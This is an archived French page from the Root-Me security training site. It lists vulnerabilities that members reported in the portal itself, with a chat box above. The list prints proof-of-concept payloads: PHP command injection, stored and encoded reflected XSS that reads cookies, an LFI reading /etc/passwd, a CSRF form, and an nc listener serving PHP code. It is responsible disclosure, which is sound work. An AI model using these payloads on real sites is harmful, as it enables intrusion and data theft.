logo http://www.root-me.org logo http://www.root-me.orglogo http://www.root-me.org Créer un compte | Connectez vous | English  
Accueil  -> Informations  -> Faiblesses découvertes
Flux Twitter
Vos Informations

IP : 38.107.179.221
Location :
Langue : en-us
Navigateur : CCBot/1.0 (+http://www.commoncrawl.org/bot.html)

Update - RSS

Dernière mise à jour :
2012-02-20 09:28:09

 Flux Dynamique

Utilisateurs

8 visiteurs en ce moment

Derniers Inscrits :
 sebspam   Xtruc   theweep   Nobody   Nobody   dugast_a   mrN0P 
Statistiques
statistiques -Membres : 1772
-Articles : 466
-Messages : 277
-Chat Box : 396
-Challengeurs : 1154
Chat Box
g0uZ    20 février 2012 22:21:48

g0uZ    17 février 2012 14:23:44
Thx pour l’info lupiotte. Il y avait effectivement un souci avec le FW local et avec hbinary5. Pour les perms ca pose pas de pb (EDIT : mais on a qd mm durci un peu). Merci encore pour ton retour.

lupiotte    17 février 2012 12:47:45
[4admins] hbinary5 ne tourne pas : /etc/xinetd.d/hbinary5 => mauvais user donc ne se lance pas ;) Autre point : on peut recuperer les fichiers de tous les challenges(droits laxiste, sshd NOT hardened) contact vers l’exterieur (network,nc,git,sftp,...)

rootmoi    16 février 2012 20:35:57
hello 69, je veux monter une team pour la ST’HAck de Bordeaux https://sthack.ingesup.com/ contactez moi sur giganum@hotmail.fr

bgxman    10 février 2012 22:21:35
t’as un skype ou un truc pour parler ? et pourquoi mon pseudo est devenus ilteurner à mes dernier message ?

RedCrach    9 février 2012 22:46:51
contact moi ^^ j’ai un peut le temps libre mais n’attend pas que je te donne un cours de A-Z tu doit qu’en meme chercher par toi meme comme tous les autre ^^

Ilteurner    9 février 2012 19:38:59
quelq’un pourrais m’apprendre les bases SVP ? je suis debutant^^.

Ilteurner    9 février 2012 19:36:43
Est-ce que quelqu’un pourrait m’empliquer 2 ou 3 petit truc svp, sur skype ou msn, serieux, je suis bloqué, je comprends pas certaine chose, merci

bgxman    9 février 2012 18:44:32
Est-ce que quelqu’un pourrait m’empliquer 2 ou 3 petit truc svp, sur skype ou msn, serieux, je suis bloqué, je comprends pas certaine chose, merci

bgxman    7 février 2012 21:26:35
je vais commencer à m’apprendre les bases de la programmation, mais je ne connais,strictemen rien aux hack,je regardais les truc genre capture the flag ect et je me demandais...comment on fait ? parcequ’en gros,je n’y connais strictement rien merci


Vous devez être loggué pour pouvoir poster des messages
HG

Faiblesses découvertes

Comme n’importe quel système d’informations ce portail comporte des vulnérabilités...

- [02/12/2009] real a identifier une injection de PHP sur la page poster.html. Cela permettait entre autre d’exécuter des commandes système avec les privilèges de l’utilisateur exécutant le serveur HTTP :

http://www.root-me.org/spip.php?page=poster&id_article=1'.system('pwd').'

- [02/02/2011] hello a identifié plusieurs vulnérabilités de type stored XSS, notamment dans le corps d’un message privé et sur les champs "login" et "nom" du formulaire d’inscription :

<script>[code javascript/vbscript]</script>

- [15/02/2011] essandre a identifié une vulnérabilité de type inclusion de fichiers locaux (LFI) permettant de lire le contenu de n’importe quel fichier accessible en lecture au serveur web :

http://www.root-me.org/squelettes/script/protection_acces_http.php?file=../../../../../../../etc/passwd

- [30/06/2011] elyfean a identifié une vulnérabilité de type CSRF sur la chatbox. Cela permettait entre autre de faire poster n’importe quoi à une personne authentifiée sur le portail visitant une page piégée avec ce code :

<form id="form" action="http//www.root-me.org/?lang=fr" method="post">
<input type=hidden name="ON" value="1">
<input type=hidden name="message" value="0wn3d !">
</form>

- [18/07/2011] g0uZ a identifié une vulnérabilité de type injection de code PHP sur la page "outils en ligne : nmap", permettant entre autre d’exécuter des commandes système avec les privilèges de l’utilisateur exécutant le serveur HTTP.

hôte a scanner en mode -sV :

--version-trace -p8888 [IP serveur maîtrisé]

Service en écoute sur le serveur maîtrisé :

i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done

- [02/10/2011] Hypnoze57 a identifié une vulnérabilité de type "référence indirecte à un objet non sécurisée" permettant de lire les messages privés de tous les membres :

http://www.root-me.org/spip.php?page=messagerie&id=write&repondre=[id_message_a_lire]

- [23/10/2011] courte66 a identifié une vulnérabilité de type reflected XSS sur la page "coder - décoder" :

Texte à décoder en base64 :

Jz4iPjxpbWcgc3JjPWxvbCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSkgLz4=
BG BD

Le Projet |  Informations Légales |  Plan du site |  Contact |  S'inscrire     
Root
Me.org
La root est longue, mais la voie est Libre...